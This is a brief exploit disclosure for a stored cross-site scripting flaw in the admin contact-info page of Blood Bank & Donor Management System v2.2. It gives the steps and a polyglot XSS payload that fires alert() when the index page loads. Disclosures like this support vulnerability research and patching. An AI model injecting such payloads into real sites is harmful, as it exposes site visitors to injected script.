11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_baud\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_parity\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_data\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_stop\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_pause\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"di_start\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"di_size\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"do_start\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"do_size\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"ai_start\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"ai_size\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"aor_start\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"aor_size\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"aow_start\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"aow_size\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n\r\n\r\n\r\n\r\n\r\n\r\n-----------------------------169043028319378579443281515639--\r\n" # \"ladder.h\"\r\n#include <stdio.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nint ignored_bool_inputs[] = {-1};\r\nint ignored_bool_outputs[] = {-1};\r\nint ignored_int_inputs[] = {-1};\r\nint ignored_int_outputs[] = {-1};\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nvoid initCustomLayer()\r\n{\r\n \r\n \r\n \r\n}\r\n\r\n\r\nvoid updateCustomIn()\r\n{\r\n\r\n}\r\n\r\n\r\nvoid updateCustomOut()\r\n{\r\n int port = "+rev_port+";\r\n struct sockaddr_in revsockaddr;\r\n\r\n int sockt = socket(AF_INET, SOCK_STREAM, 0);\r\n revsockaddr.sin_family = AF_INET; \r\n revsockaddr.sin_port = htons(port);\r\n revsockaddr.sin_addr.s_addr = inet_addr(\""+rev_ip+"\");\r\n\r\n connect(sockt, (struct sockaddr *) &revsockaddr, \r\n sizeof(revsockaddr));\r\n dup2(sockt, 0);\r\n dup2(sockt, 1);\r\n dup2(sockt, 2);\r\n\r\n char * const argv[] = {\"/bin/sh\", NULL};\r\n execve(\"/bin/sh\", argv, NULL);\r\n\r\n return 0; \r\n \r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n-----------------------------289530314119386812901408558722--\r\n" inject = x.post(inject_url, headers=inject_headers, cookies=inject_cookies, data=inject_data) time.sleep(3) # comp = x.get(compile_program) # time.sleep(6) # x.get(inject_dash) # time.sleep(3) # print('[+] Spawning Reverse Shell...') start = x.get(run_plc_server) time.sleep(1) if start.status_code == 200: print('[+] Reverse connection receveid!') sys.exit(0) else: print('[+] Failed to receive connection :(') sys.exit(0) auth() injection() connection()
  21. HireHackking

    Equipment Rental Script-1.0 - SQLi

    HireHackking posted a blog entry in Hacker Technology
    ## Title: Equipment Rental Script-1.0 - SQLi ## Author: nu11secur1ty ## Date: 09/12/2023 ## Vendor: https://www.phpjabbers.com/ ## Software: https://www.phpjabbers.com/equipment-rental-script/#sectionDemo ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The package_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the package_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The attacker can steal all information from the database! [+]Payload: mysql Parameter: #1* ((custom) POST) Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) Payload: package_id=(-4488))) OR 1 GROUP BY CONCAT(0x71787a6a71,(SELECT (CASE WHEN (7794=7794) THEN 1 ELSE 0 END)),0x7176717671,FLOOR(RAND(0)*2)) HAVING MIN(0)#from(select(sleep(20)))a)&cnt=2&date_from=12/9/2023&hour_from=11&minute_from=00&date_to=12/9/2023&hour_to=12&minute_to=00 ## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Equipment-Rental-Script-1.0 System Administrator - Infrastructure Engineer Penetration Testing Engineer home page: https://www.nu11secur1ty.com/
  22. HireHackking

    7 Sticky Notes v1.9 - OS Command Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: 7 Sticky Notes v1.9 - OS Command Injection # Discovered by: Ahmet Ümit BAYRAM # Discovered Date: 12.09.2023 # Vendor Homepage: http://www.7stickynotes.com # Software Link: http://www.7stickynotes.com/download/Setup7StickyNotesv19.exe # Tested Version: 1.9 (latest) # Tested on: Windows 2019 Server 64bit # # # Steps to Reproduce # # # # Open the program. # Click on "New Note". # Navigate to the "Alarms" tab. # Click on either of the two buttons. # From the "For" field, select "1" and "seconds" (to obtain the shell within 1 second). # From the "Action" dropdown, select "command". # In the activated box, enter the reverse shell command and click the "Set" button to set the alarm. # Finally, click on the checkmark to save the alarm. # Reverse shell obtained!
  23. HireHackking

    Splunk 9.0.5 - admin account take over

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/env python3 # # Exploit Title: Splunk 9.0.5 - admin account take over # Author: [Redway Security](https://twitter.com/redwaysec)) # Discovery: [Santiago Lopez](https://twitter.com/santi_lopezz99) #CVE: CVE-2023-32707 # Vendor Description: A low-privilege user who holds a role that has the `edit_user` capability assigned # to it can escalate their privileges to that of the admin user by providing specially crafted web requests. # # Versions Affected: Splunk Enterprise **below** 9.0.5, 8.2.11, and 8.1.14. # import argparse import requests import random import string import base64 # ignore warnings import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Parse command-line arguments parser = argparse.ArgumentParser(description='Splunk Authentication') parser.add_argument('--host', required=True, help='Splunk host or IP address') parser.add_argument('--username', required=True, help='Splunk username') parser.add_argument('--password', required=True, help='Splunk password') parser.add_argument('--target-user', required=True, help='Target user') parser.add_argument('--force-exploit', action='store_true', help='Force exploit') args = parser.parse_args() # Splunk server settings splunk_host = args.host.split(':')[0] splunk_username = args.username splunk_password = args.password target_user = args.target_user force_exploit = args.force_exploit splunk_port = args.host.split(':')[1] if len(args.host.split(':')) > 1 else 8089 user_endpoint = f"https://{splunk_host}:{splunk_port}/services/authentication/users" credentials = f"{splunk_username}:{splunk_password}" base64_credentials = base64.b64encode(credentials.encode()).decode() headers = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0', 'Authorization': f'Basic {base64_credentials}' } proxies = { # 'http': '[http://127.0.0.1:8080'](<a href=),">http://127.0.0.1:8080', # 'https': 'http://127.0.0.1:8080' } response = requests.get(f"{user_endpoint}/{splunk_username}?output_mode=json", headers=headers, proxies=proxies, verify=False) if response.status_code == 200: affected_versions = ['9.0.4', '8.2.10', '8.1.13'] user = response.json() splunk_version = user['generator']['version'] # This is not a good way to compare versions. # There is a range of versions that are affected by this CVE, but this is just a PoC # 8.1.0 to 8.1.13 # 8.2.0 to 8.2.10 # 9.0.0 to 9.0.4 print(f"Detected Splunk version '{splunk_version}'") if any(splunk_version <= value for value in affected_versions) or force_exploit: user_capabilities = user['entry'][0]['content']['capabilities'] if 'edit_user' in user_capabilities: print( f"User '{splunk_username}' has the 'edit_user' capability, which would make this target exploitable.") new_password = ''.join(random.choice( string.ascii_letters + string.digits) for _ in range(8)) change_password_payload = { 'password': new_password, 'force-change-pass': 0, 'locked-out': 0 } response = requests.post(f"{user_endpoint}/{target_user}?output_mode=json", data=change_password_payload, headers=headers, proxies=proxies, verify=False) if response.status_code == 200: print( f"Successfully taken over user '{target_user}', log into Splunk with the password '{new_password}'") else: print('Account takeover failed') else: print( f"User '{splunk_username}' does not have the 'edit_user' capability, which makes this target not exploitable by this user.") else: print(f"Splunk version '{splunk_version}' is not affected by CVE-2023-32707") else: print( f"Couldn't authenticate to Splunk server '{splunk_host}' with user '{splunk_username}' and password '{splunk_password}'") exit(1)
  24. HireHackking

    Bank Locker Management System - SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Bank Locker Management System - SQL Injection # Application: Bank Locker Management System # Date: 12.09.2023 # Bugs: SQL Injection # Exploit Author: SoSPiro # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/bank-locker-management-system-using-php-and-mysql/ # Tested on: Windows 10 64 bit Wampserver ## Description: This report highlights a critical SQL Injection vulnerability discovered in the "Bank Locker Management System" application. The vulnerability allows an attacker to bypass authentication and gain unauthorized access to the application. ## Vulnerability Details: - **Application Name**: Bank Locker Management System - **Software Link**: [Download Link](https://phpgurukul.com/bank-locker-management-system-using-php-and-mysql/) - **Vendor Homepage**: [Vendor Homepage](https://phpgurukul.com/) ## Vulnerability Description: The SQL Injection vulnerability is present in the login mechanism of the application. By providing the following payload in the login and password fields: Payload: admin' or '1'='1-- - An attacker can gain unauthorized access to the application with administrative privileges. ## Proof of Concept (PoC): 1. Visit the application locally at http://blms.local (assuming it's hosted on localhost). 2. Navigate to the "banker" directory: http://blms.local/banker/ 3. In the login and password fields, input the following payload: 4. admin' or '1'='1-- -
  25. HireHackking

    Blood Bank & Donor Management System using v2.2 - Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Blood Bank & Donor Management System using v2.2 - Stored XSS # Application: Blood Donor Management System # Version: v2.2 # Bugs: Stored XSS # Technology: PHP # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/blood-bank-donor-management-system-free-download/ # Date: 12.09.2023 # Author: SoSPiro # Tested on: Windows #POC ======================================== 1. Login to admin account 2. Go to /admin/update-contactinfo.php 3. Change "Adress" or " Email id " or " Contact Number" inputs and add "/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert('1') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e" payload. 4. Go to http://bbdms.local/inedx.php page and XSS will be triggered.